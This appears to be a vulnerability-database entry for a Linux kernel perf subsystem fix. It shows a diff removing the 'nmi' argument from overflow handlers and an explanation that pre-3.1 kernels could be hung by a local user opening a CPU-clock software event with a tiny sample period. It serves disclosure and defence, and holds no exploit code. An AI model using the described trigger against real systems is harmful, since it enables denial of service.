     	perf_prepare_sample(&header, &data, event, &regs);
     
    -	if (perf_output_begin(&handle, event, header.size * (top - at), 1, 1))
    +	if (perf_output_begin(&handle, event, header.size * (top - at), 1))
     		return 1;
     
     	for (; at < top; at++) {
    @@ -616,7 +616,7 @@ static void __intel_pmu_pebs_event(struct perf_event *event,
     	else
     		regs.flags &= ~PERF_EFLAGS_EXACT;
     
    -	if (perf_event_overflow(event, 1, &data, &regs))
    +	if (perf_event_overflow(event, &data, &regs))
     		x86_pmu_stop(event, 0);
     }
     
    
  • arch/x86/kernel/cpu/perf_event_p4.c · +1 −1 · modified
    @@ -970,7 +970,7 @@ static int p4_pmu_handle_irq(struct pt_regs *regs)
     
     		if (!x86_perf_event_set_period(event))
     			continue;
    -		if (perf_event_overflow(event, 1, &data, regs))
    +		if (perf_event_overflow(event, &data, regs))
     			x86_pmu_stop(event, 0);
     	}
     
    
  • arch/x86/kernel/kgdb.c · +1 −1 · modified
    @@ -608,7 +608,7 @@ int kgdb_arch_init(void)
     	return register_die_notifier(&kgdb_notifier);
     }
     
    -static void kgdb_hw_overflow_handler(struct perf_event *event, int nmi,
    +static void kgdb_hw_overflow_handler(struct perf_event *event,
     		struct perf_sample_data *data, struct pt_regs *regs)
     {
     	struct task_struct *tsk = current;
    
  • arch/x86/kernel/ptrace.c · +1 −1 · modified
    @@ -528,7 +528,7 @@ static int genregs_set(struct task_struct *target,
     	return ret;
     }
     
    -static void ptrace_triggered(struct perf_event *bp, int nmi,
    +static void ptrace_triggered(struct perf_event *bp,
     			     struct perf_sample_data *data,
     			     struct pt_regs *regs)
     {
    
  • arch/x86/mm/fault.c · +3 −3 · modified
    @@ -1059,7 +1059,7 @@ do_page_fault(struct pt_regs *regs, unsigned long error_code)
     	if (unlikely(error_code & PF_RSVD))
     		pgtable_bad(regs, error_code, address);
     
    -	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, 0, regs, address);
    +	perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS, 1, regs, address);
     
     	/*
     	 * If we're in an interrupt, have no user context or are running
    @@ -1161,11 +1161,11 @@ do_page_fault(struct pt_regs *regs, unsigned long error_code)
     	if (flags & FAULT_FLAG_ALLOW_RETRY) {
     		if (fault & VM_FAULT_MAJOR) {
     			tsk->maj_flt++;
    -			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1, 0,
    +			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MAJ, 1,
     				      regs, address);
     		} else {
     			tsk->min_flt++;
    -			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1, 0,
    +			perf_sw_event(PERF_COUNT_SW_PAGE_FAULTS_MIN, 1,
     				      regs, address);
     		}
     		if (fault & VM_FAULT_RETRY) {
    
  • include/linux/perf_event.h · +8 −10 · modified
    @@ -682,7 +682,7 @@ enum perf_event_active_state {
     struct file;
     struct perf_sample_data;
     
    -typedef void (*perf_overflow_handler_t)(struct perf_event *, int,
    +typedef void (*perf_overflow_handler_t)(struct perf_event *,
     					struct perf_sample_data *,
     					struct pt_regs *regs);
     
    @@ -925,7 +925,6 @@ struct perf_output_handle {
     	unsigned long			size;
     	void				*addr;
     	int				page;
    -	int				nmi;
     	int				sample;
     };
     
    @@ -993,7 +992,7 @@ extern void perf_prepare_sample(struct perf_event_header *header,
     				struct perf_event *event,
     				struct pt_regs *regs);
     
    -extern int perf_event_overflow(struct perf_event *event, int nmi,
    +extern int perf_event_overflow(struct perf_event *event,
     				 struct perf_sample_data *data,
     				 struct pt_regs *regs);
     
    @@ -1012,7 +1011,7 @@ static inline int is_software_event(struct perf_event *event)
     
     extern struct jump_label_key perf_swevent_enabled[PERF_COUNT_SW_MAX];
     
    -extern void __perf_sw_event(u32, u64, int, struct pt_regs *, u64);
    +extern void __perf_sw_event(u32, u64, struct pt_regs *, u64);
     
     #ifndef perf_arch_fetch_caller_regs
     static inline void perf_arch_fetch_caller_regs(struct pt_regs *regs, unsigned long ip) { }
    @@ -1034,7 +1033,7 @@ static inline void perf_fetch_caller_regs(struct pt_regs *regs)
     }
     
     static __always_inline void
    -perf_sw_event(u32 event_id, u64 nr, int nmi, struct pt_regs *regs, u64 addr)
    +perf_sw_event(u32 event_id, u64 nr, struct pt_regs *regs, u64 addr)
     {
     	struct pt_regs hot_regs;
     
    @@ -1043,7 +1042,7 @@ perf_sw_event(u32 event_id, u64 nr, int nmi, struct pt_regs *regs, u64 addr)
     			perf_fetch_caller_regs(&hot_regs);
     			regs = &hot_regs;
     		}
    -		__perf_sw_event(event_id, nr, nmi, regs, addr);
    +		__perf_sw_event(event_id, nr, regs, addr);
     	}
     }
     
    @@ -1057,7 +1056,7 @@ static inline void perf_event_task_sched_in(struct task_struct *task)
     
     static inline void perf_event_task_sched_out(struct task_struct *task, struct task_struct *next)
     {
    -	perf_sw_event(PERF_COUNT_SW_CONTEXT_SWITCHES, 1, 1, NULL, 0);
    +	perf_sw_event(PERF_COUNT_SW_CONTEXT_SWITCHES, 1, NULL, 0);
     
     	__perf_event_task_sched_out(task, next);
     }
    @@ -1119,7 +1118,7 @@ extern void perf_bp_event(struct perf_event *event, void *data);
     
     extern int perf_output_begin(struct perf_output_handle *handle,
     			     struct perf_event *event, unsigned int size,
    -			     int nmi, int sample);
    +			     int sample);
     extern void perf_output_end(struct perf_output_handle *handle);
     extern void perf_output_copy(struct perf_output_handle *handle,
     			     const void *buf, unsigned int len);
    @@ -1143,8 +1142,7 @@ static inline int perf_event_task_disable(void)				{ return -EINVAL; }
     static inline int perf_event_task_enable(void)				{ return -EINVAL; }
     
     static inline void
    -perf_sw_event(u32 event_id, u64 nr, int nmi,
    -		     struct pt_regs *regs, u64 addr)			{ }
    +perf_sw_event(u32 event_id, u64 nr, struct pt_regs *regs, u64 addr)	{ }
     static inline void
     perf_bp_event(struct perf_event *event, void *data)			{ }
     
    
  • kernel/events/core.c · +28 −35 · modified
    @@ -3972,7 +3972,7 @@ void perf_prepare_sample(struct perf_event_header *header,
     	}
     }
     
    -static void perf_event_output(struct perf_event *event, int nmi,
    +static void perf_event_output(struct perf_event *event,
     				struct perf_sample_data *data,
     				struct pt_regs *regs)
     {
    @@ -3984,7 +3984,7 @@ static void perf_event_output(struct perf_event *event, int nmi,
     
     	perf_prepare_sample(&header, data, event, regs);
     
    -	if (perf_output_begin(&handle, event, header.size, nmi, 1))
    +	if (perf_output_begin(&handle, event, header.size, 1))
     		goto exit;
     
     	perf_output_sample(&handle, &header, data, event);
    @@ -4024,7 +4024,7 @@ perf_event_read_event(struct perf_event *event,
     	int ret;
     
     	perf_event_header__init_id(&read_event.header, &sample, event);
    -	ret = perf_output_begin(&handle, event, read_event.header.size, 0, 0);
    +	ret = perf_output_begin(&handle, event, read_event.header.size, 0);
     	if (ret)
     		return;
     
    @@ -4067,7 +4067,7 @@ static void perf_event_task_output(struct perf_event *event,
     	perf_event_header__init_id(&task_event->event_id.header, &sample, event);
     
     	ret = perf_output_begin(&handle, event,
    -				task_event->event_id.header.size, 0, 0);
    +				task_event->event_id.header.size, 0);
     	if (ret)
     		goto out;
     
    @@ -4204,7 +4204,7 @@ static void perf_event_comm_output(struct perf_event *event,
     
     	perf_event_header__init_id(&comm_event->event_id.header, &sample, event);
     	ret = perf_output_begin(&handle, event,
    -				comm_event->event_id.header.size, 0, 0);
    +				comm_event->event_id.header.size, 0);
     
     	if (ret)
     		goto out;
    @@ -4351,7 +4351,7 @@ static void perf_event_mmap_output(struct perf_event *event,
     
     	perf_event_header__init_id(&mmap_event->event_id.header, &sample, event);
     	ret = perf_output_begin(&handle, event,
    -				mmap_event->event_id.header.size, 0, 0);
    +				mmap_event->event_id.header.size, 0);
     	if (ret)
     		goto out;
     
    @@ -4546,7 +4546,7 @@ static void perf_log_throttle(struct perf_event *event, int enable)
     	perf_event_header__init_id(&throttle_event.header, &sample, event);
     
     	ret = perf_output_begin(&handle, event,
    -				throttle_event.header.size, 1, 0);
    +				throttle_event.header.size, 0);
     	if (ret)
     		return;
     
    @@ -4559,7 +4559,7 @@ static void perf_log_throttle(struct perf_event *event, int enable)
      * Generic event overflow handling, sampling.
      */
     
    -static int __perf_event_overflow(struct perf_event *event, int nmi,
    +static int __perf_event_overflow(struct perf_event *event,
     				   int throttle, struct perf_sample_data *data,
     				   struct pt_regs *regs)
     {
    @@ -4602,34 +4602,28 @@ static int __perf_event_overflow(struct perf_event *event, int nmi,
     	if (events && atomic_dec_and_test(&event->event_limit)) {
     		ret = 1;
     		event->pending_kill = POLL_HUP;
    -		if (nmi) {
    -			event->pending_disable = 1;
    -			irq_work_queue(&event->pending);
    -		} else
    -			perf_event_disable(event);
    +		event->pending_disable = 1;
    +		irq_work_queue(&event->pending);
     	}
     
     	if (event->overflow_handler)
    -		event->overflow_handler(event, nmi, data, regs);
    +		event->overflow_handler(event, data, regs);
     	else
    -		perf_event_output(event, nmi, data, regs);
    +		perf_event_output(event, data, regs);
     
     	if (event->fasync && event->pending_kill) {
    -		if (nmi) {
    -			event->pending_wakeup = 1;
    -			irq_work_queue(&event->pending);
    -		} else
    -			perf_event_wakeup(event);
    +		event->pending_wakeup = 1;
    +		irq_work_queue(&event->pending);
     	}
     
     	return ret;
     }
     
    -int perf_event_overflow(struct perf_event *event, int nmi,
    +int perf_event_overflow(struct perf_event *event,
     			  struct perf_sample_data *data,
     			  struct pt_regs *regs)
     {
    -	return __perf_event_overflow(event, nmi, 1, data, regs);
    +	return __perf_event_overflow(event, 1, data, regs);
     }
     
     /*
    @@ -4678,7 +4672,7 @@ static u64 perf_swevent_set_period(struct perf_event *event)
     }
     
     static void perf_swevent_overflow(struct perf_event *event, u64 overflow,
    -				    int nmi, struct perf_sample_data *data,
    +				    struct perf_sample_data *data,
     				    struct pt_regs *regs)
     {
     	struct hw_perf_event *hwc = &event->hw;
    @@ -4692,7 +4686,7 @@ static void perf_swevent_overflow(struct perf_event *event, u64 overflow,
     		return;
     
     	for (; overflow; overflow--) {
    -		if (__perf_event_overflow(event, nmi, throttle,
    +		if (__perf_event_overflow(event, throttle,
     					    data, regs)) {
     			/*
     			 * We inhibit the overflow from happening when
    @@ -4705,7 +4699,7 @@ static void perf_swevent_overflow(struct perf_event *event, u64 overflow,
     }
     
     static void perf_swevent_event(struct perf_event *event, u64 nr,
    -			       int nmi, struct perf_sample_data *data,
    +			       struct perf_sample_data *data,
     			       struct pt_regs *regs)
     {
     	struct hw_perf_event *hwc = &event->hw;
    @@ -4719,12 +4713,12 @@ static void perf_swevent_event(struct perf_event *event, u64 nr,
     		return;
     
     	if (nr == 1 && hwc->sample_period == 1 && !event->attr.freq)
    -		return perf_swevent_overflow(event, 1, nmi, data, regs);
    +		return perf_swevent_overflow(event, 1, data, regs);
     
     	if (local64_add_negative(nr, &hwc->period_left))
     		return;
     
    -	perf_swevent_overflow(event, 0, nmi, data, regs);
    +	perf_swevent_overflow(event, 0, data, regs);
     }
     
     static int perf_exclude_event(struct perf_event *event,
    @@ -4812,7 +4806,7 @@ find_swevent_head(struct swevent_htable *swhash, struct perf_event *event)
     }
     
     static void do_perf_sw_event(enum perf_type_id type, u32 event_id,
    -				    u64 nr, int nmi,
    +				    u64 nr,
     				    struct perf_sample_data *data,
     				    struct pt_regs *regs)
     {
    @@ -4828,7 +4822,7 @@ static void do_perf_sw_event(enum perf_type_id type, u32 event_id,
     
     	hlist_for_each_entry_rcu(event, node, head, hlist_entry) {
     		if (perf_swevent_match(event, type, event_id, data, regs))
    -			perf_swevent_event(event, nr, nmi, data, regs);
    +			perf_swevent_event(event, nr, data, regs);
     	}
     end:
     	rcu_read_unlock();
    @@ -4849,8 +4843,7 @@ inline void perf_swevent_put_recursion_context(int rctx)
     	put_recursion_context(swhash->recursion, rctx);
     }
     
    -void __perf_sw_event(u32 event_id, u64 nr, int nmi,
    -			    struct pt_regs *regs, u64 addr)
    +void __perf_sw_event(u32 event_id, u64 nr, struct pt_regs *regs, u64 addr)
     {
     	struct perf_sample_data data;
     	int rctx;
    @@ -4862,7 +4855,7 @@ void __perf_sw_event(u32 event_id, u64 nr, int nmi,
     
     	perf_sample_data_init(&data, addr);
     
    -	do_perf_sw_event(PERF_TYPE_SOFTWARE, event_id, nr, nmi, &data, regs);
    +	do_perf_sw_event(PERF_TYPE_SOFTWARE, event_id, nr, &data, regs);
     
     	perf_swevent_put_recursion_context(rctx);
     	preempt_enable_notrace();
    @@ -5110,7 +5103,7 @@ void perf_tp_event(u64 addr, u64 count, void *record, int entry_size,
     
     	hlist_for_each_entry_rcu(event, node, head, hlist_entry) {
     		if (perf_tp_event_match(event, &data, regs))
    -			perf_swevent_event(event, count, 1, &data, regs);
    +			perf_swevent_event(event, count, &data, regs);
     	}
     
     	perf_swevent_put_recursion_context(rctx);
    @@ -5203,7 +5196,7 @@ void perf_bp_event(struct perf_event *bp, void *data)
     	perf_sample_data_init(&sample, bp->attr.bp_addr);
     
     	if (!bp->hw.state && !perf_exclude_event(bp, regs))
    -		perf_swevent_event(bp, 1, 1, &sample, regs);
    +		perf_swevent_event(bp, 1, &sample, regs);
     }
     #endif
     
    @@ -5232,7 +5225,7 @@ static enum hrtimer_restart perf_swevent_hrtimer(struct hrtimer *hrtimer)
     
     	if (regs && !perf_exclude_event(event, regs)) {
     		if (!(event->attr.exclude_idle && current->pid == 0))
    -			if (perf_event_overflow(event, 0, &data, regs))
    +			if (perf_event_overflow(event, &data, regs))
     				ret = HRTIMER_NORESTART;
     	}
     
    
  • kernel/events/internal.h · +0 −1 · modified
    @@ -27,7 +27,6 @@ struct ring_buffer {
     	void				*data_pages[0];
     };
     
    -
     extern void rb_free(struct ring_buffer *rb);
     extern struct ring_buffer *
     rb_alloc(int nr_pages, long watermark, int cpu, int flags);
    
  • kernel/events/ring_buffer.c · +3 −7 · modified
    @@ -38,11 +38,8 @@ static void perf_output_wakeup(struct perf_output_handle *handle)
     {
     	atomic_set(&handle->rb->poll, POLL_IN);
     
    -	if (handle->nmi) {
    -		handle->event->pending_wakeup = 1;
    -		irq_work_queue(&handle->event->pending);
    -	} else
    -		perf_event_wakeup(handle->event);
    +	handle->event->pending_wakeup = 1;
    +	irq_work_queue(&handle->event->pending);
     }
     
     /*
    @@ -102,7 +99,7 @@ static void perf_output_put_handle(struct perf_output_handle *handle)
     
     int perf_output_begin(struct perf_output_handle *handle,
     		      struct perf_event *event, unsigned int size,
    -		      int nmi, int sample)
    +		      int sample)
     {
     	struct ring_buffer *rb;
     	unsigned long tail, offset, head;
    @@ -127,7 +124,6 @@ int perf_output_begin(struct perf_output_handle *handle,
     
     	handle->rb	= rb;
     	handle->event	= event;
    -	handle->nmi	= nmi;
     	handle->sample	= sample;
     
     	if (!rb->nr_pages)
    
  • kernel/sched.c · +1 −1 · modified
    @@ -2220,7 +2220,7 @@ void set_task_cpu(struct task_struct *p, unsigned int new_cpu)
     
     	if (task_cpu(p) != new_cpu) {
     		p->se.nr_migrations++;
    -		perf_sw_event(PERF_COUNT_SW_CPU_MIGRATIONS, 1, 1, NULL, 0);
    +		perf_sw_event(PERF_COUNT_SW_CPU_MIGRATIONS, 1, NULL, 0);
     	}
     
     	__set_task_cpu(p, new_cpu);
    
  • kernel/watchdog.c · +1 −1 · modified
    @@ -211,7 +211,7 @@ static struct perf_event_attr wd_hw_attr = {
     };
     
     /* Callback function for perf event subsystem */
    -static void watchdog_overflow_callback(struct perf_event *event, int nmi,
    +static void watchdog_overflow_callback(struct perf_event *event,
     		 struct perf_sample_data *data,
     		 struct pt_regs *regs)
     {
    
  • samples/hw_breakpoint/data_breakpoint.c · +1 −1 · modified
    @@ -41,7 +41,7 @@ module_param_string(ksym, ksym_name, KSYM_NAME_LEN, S_IRUGO);
     MODULE_PARM_DESC(ksym, "Kernel symbol to monitor; this module will report any"
     			" write operations on the kernel symbol");
     
    -static void sample_hbp_handler(struct perf_event *bp, int nmi,
    +static void sample_hbp_handler(struct perf_event *bp,
     			       struct perf_sample_data *data,
     			       struct pt_regs *regs)
     {
    

Vulnerability mechanics

PERF_COUNT_SW_CPU_CLOCK is a software event driven by an hrtimer, so its overflows are delivered from interrupt context. In kernels before 3.1, perf_swevent_hrtimer() called perf_event_overflow() with nmi=0 (see the kernel/events/core.c hunk above), and the nmi==0 branch of __perf_event_overflow() then invoked perf_event_disable() and perf_event_wakeup() directly instead of deferring them; neither is safe to call from that context. A local user who opens such an event with a tiny sample period can therefore force rapid overflows and hang the system. The fix removes the nmi parameter altogether: the pending disable and wakeup are always deferred through irq_work_queue(), so the overflow path behaves the same regardless of the context it runs in.
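
A compressed sketch of that deferral idiom follows (a hypothetical kernel-style fragment written for this note, not lines taken from the patch):

    /*
     * Hypothetical fragment illustrating the irq_work idiom the fix
     * standardizes on: never call wakeup/disable helpers directly from
     * (hard)irq or NMI context; record pending state and let an
     * irq_work run it once a safe context is reached.
     */
    #include <linux/irq_work.h>

    static struct irq_work pending_work;

    /* Runs shortly after the interrupt returns; safe for wakeups. */
    static void pending_work_fn(struct irq_work *work)
    {
        /* e.g. perform the deferred wakeup/disable here */
    }

    static void setup(void)
    {
        init_irq_work(&pending_work, pending_work_fn);
    }

    /* Called from irq/NMI context, where direct wakeups could hang. */
    static void overflow_from_irq_context(void)
    {
        /* Was: if (nmi) queue, else call directly. Now: always defer. */
        irq_work_queue(&pending_work);
    }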

References (4)

News mentions (0)

No linked articles in our index yet.